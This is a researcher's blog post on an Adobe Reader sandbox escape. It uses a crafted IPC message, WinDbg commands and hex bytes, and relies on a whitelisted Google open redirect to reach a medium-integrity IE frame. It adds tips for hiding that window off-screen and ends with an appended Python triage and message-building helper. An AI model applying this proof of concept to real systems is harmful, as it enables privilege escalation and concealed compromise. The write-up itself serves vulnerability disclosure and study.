Friday, January 19, 2018

Adobe Reader Escape... or how to steal research and be lame.

(I hope I’m not overlooking anything and making wrong assumptions... I’m not a very smart person)

Version tested:


Note: A similar, if not the same, bug was discussed in this talk: https://cansecwest.com/slides/2013/Adobe%20Sandbox.pdf (using a different method of navigating, which I think does not work anymore today).

How to reproduce:
1. Open windbg and attach to the low-IL AcroRd32.exe process.
2. Put a breakpoint on the function responsible for sending our IPC call to the broker process:

bp AcroRd32.exe+0x14D30

Note: This is of course version dependent; just search for xrefs to the import “SignalObjectAndWait”. Normally only this function calls it, regardless of version (just bp at the start of the function).

3. Let it run and wait for the breakpoint to hit. Once that happens we simply replace the message with a crafted one using the following command:

Eb poi(esp+0x4) 11 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 00 00 00 04 00 00 00 AC 00 00 00 04 00 00 00 01 00 00 00 B4 00 00 00 EC 00 00 00 02 00 00 00 A4 01 00 00 04 00 00 00 02 00 00 00 AC 01 00 00 04 00 00 00 02 00 00 00 B4 01 00 00 04 00 00 00 02 00 00 00 BC 01 00 00 04 00 00 00 02 00 00 00 C4 01 00 00 04 00 00 00 06 00 00 00 CC 01 00 00 0A 02 00 00 00 00 00 00 FF FF 00 00 00 00 00 00 00 00 00 00 00 00 00 00 68 00 74 00 74 00 70 00 73 00 3A 00 2F 00 2F 00 61 00 63 00 63 00 6F 00 75 00 6E 00 74 00 73 00 2E 00 67 00 6F 00 6F 00 67 00 6C 00 65 00 2E 00 63 00 6F 00 6D 00 2F 00 4C 00 6F 00 67 00 6F 00 75 00 74 00 3F 00 63 00 6F 00 6E 00 74 00 69 00 6E 00 75 00 65 00 3D 00 68 00 74 00 74 00 70 00 73 00 3A 00 2F 00 2F 00 61 00 70 00 70 00 65 00 6E 00 67 00 69 00 6E 00 65 00 2E 00 67 00 6F 00 6F 00 67 00 6C 00 65 00 2E 00 63 00 6F 00 6D 00 2F 00 5F 00 61 00 68 00 2F 00 6C 00 6F 00 67 00 6F 00 75 00 74 00 3F 00 63 00 6F 00 6E 00 74 00 69 00 6E 00 75 00 65 00 3D 00 68 00 74 00 74 00 70 00 3A 00 2F 00 2F 00 63 00 6E 00 6E 00 2E 00 63 00 6F 00 6D 00 00 00 00 00 00 00 00 00 0F 00 00 00 00 00 00 00 00 00 00 00 00 00 08 00 00 00 FF 00 00 00 00 00 00 00 FF 00 00 00 00 00 00 00 FF 02 00 00 00 00 00 00 FF 02 00 00 00 00 00 00 01 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 01 00 00 00

The tag for this “crosscall” is 0x111. It has 8 parameters, one of which is a URL. The broker process checks this URL against a hardcoded list of host names:



If our URL’s hostname matches one in the list, the broker won’t prompt before opening some weird IE frame that runs in the broker process at medium IL (best idea ever, and yes, IE = Internet Explorer).

But Adobe is not really smart, because it’s super easy to find something like this:

https://accounts.google.com/Logout?continue=https://appengine.google.com/_ah/logout?continue=http://cnn.com

So yeah, the stupid hostname is going to match (accounts.google.com is whitelisted), but the page will simply redirect to whatever we want... so that’s kind of silly. xD

So we can open weird IE windows running at medium IL without a prompt and control their contents!
Our chain would look like this: Adobe Reader RCE -> this escape -> IE RCE (it’s not pretty, but we don’t need an IE sandbox escape, since IE already runs at medium... I think... At least inspect.exe tells me it does).

We can also easily hide the IE window, since we control its size and position, and by giving the position a large value it will be rendered outside the screen for some weird reason (at least on my VM). The offsets for the position in our message are 0x1A4 and 0x1AC; the size is at 0x1B4 and 0x1BC.

If we use “normal” size and position values it will look like this. Let’s say position 0xFF, 0xFF and size 0x2FF, 0x2FF:



Now if we change our position parameters to 0x4FF and 0x4FF and the size to 0x65 and 0x65, it will look like this (it renders outside the screen!):





So besides the Adobe icon in the taskbar it won’t be suuuuper obvious... so if your IE RCE doesn’t take ages to run (once you get medium-IL RCE you just close the stupid IE window again), I guess it would be fine! This bug was one that immediately stood out for me... it’s just so obvious. But it’s an ugly bug, because it requires a long chain. Still, I have a decent idea of the attack surface now, so maybe I can find better bugs in the future!
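As an added example (not the author’s code, nor Adobe’s), here is a Python triage helper for the message layout the post walks through: it parses the tag, the descriptor table and the URL/position/size parameters, then puts the host-only allowlist check the post describes next to a check that also looks at URLs nested in the query string. The parameter type meanings, the one-entry allowlist and the sample message builder are assumptions based on the bytes shown above.

```python
import struct
from urllib.parse import urlsplit, parse_qsl

# Layout read off the bytes in the post: tag at 0x00, param count at 0x3C, (type, offset, size)
# triples from 0x40, first param at 0xAC, UTF-16LE URL at 0xB4 (0xEC bytes), ints from 0x1A4 (8 apart).
TAG_OPEN_URL, T_WSTR, T_INT = 0x111, 1, 2   # type codes as in the post; their meaning is assumed
COUNT_OFF, DESC_OFF, URL_OFF, URL_SIZE, INT_OFF = 0x3C, 0x40, 0xB4, 0xEC, 0x1A4
ALLOWLIST = {"accounts.google.com"}   # one host the post says is on the broker's list
def build_message(url, x, y, w, h):   # constructed sample, not the real client's serializer
    descs = [(4, 0xAC, 4), (T_WSTR, URL_OFF, URL_SIZE)] + [(T_INT, INT_OFF + 8 * i, 4) for i in range(5)]
    buf = bytearray(INT_OFF + 8 * 5)
    struct.pack_into("<I", buf, 0, TAG_OPEN_URL)
    struct.pack_into("<I", buf, COUNT_OFF, len(descs))
    for i, d in enumerate(descs):
        struct.pack_into("<III", buf, DESC_OFF + 12 * i, *d)
    wide = url.encode("utf-16-le")
    assert len(wide) + 2 <= URL_SIZE, "URL does not fit the 0xEC-byte slot"
    buf[URL_OFF:URL_OFF + len(wide)] = wide
    for i, v in enumerate((x, y, w, h)):
        struct.pack_into("<I", buf, INT_OFF + 8 * i, v)
    return bytes(buf)
def parse_message(buf):   # walk the descriptor table -> (tag, [(type, offset, value), ...])
    tag, count = struct.unpack_from("<I", buf, 0)[0], struct.unpack_from("<I", buf, COUNT_OFF)[0]
    params = []
    for i in range(count):
        ptype, off, size = struct.unpack_from("<III", buf, DESC_OFF + 12 * i)
        raw = buf[off:off + size]
        if ptype == T_WSTR:
            value = raw.decode("utf-16-le").split("\x00", 1)[0]
        else:
            value = struct.unpack_from("<I", raw)[0] if size == 4 else raw
        params.append((ptype, off, value))
    return tag, params
def broker_host_check(url):   # the host-only allowlist test the post says the broker performs
    return urlsplit(url).hostname in ALLOWLIST
def nested_hosts(url):   # hosts of every URL carried in the query string (continue=..., recursively)
    hosts = []
    for _, value in parse_qsl(urlsplit(url).query):
        if urlsplit(value).hostname:
            hosts += [urlsplit(value).hostname] + nested_hosts(value)
    return hosts
def triage(buf):   # flag a tag-0x111 message that passes the host check but chains off-list
    tag, params = parse_message(buf)
    if tag != TAG_OPEN_URL:
        return None
    url = next(v for t, _, v in params if t == T_WSTR)
    x, y, w, h = [v for t, _, v in params if t == T_INT][:4]
    return {"url": url, "host_ok": broker_host_check(url), "pos": (x, y), "size": (w, h),
            "off_list": [hst for hst in nested_hosts(url) if hst not in ALLOWLIST]}
```

Run `triage(build_message(url, 0x4FF, 0x4FF, 0x65, 0x65))` with the post’s redirect URL: `host_ok` comes back True while `off_list` lists appengine.google.com and cnn.com, which is exactly the gap between what the broker checks and where the frame ends up.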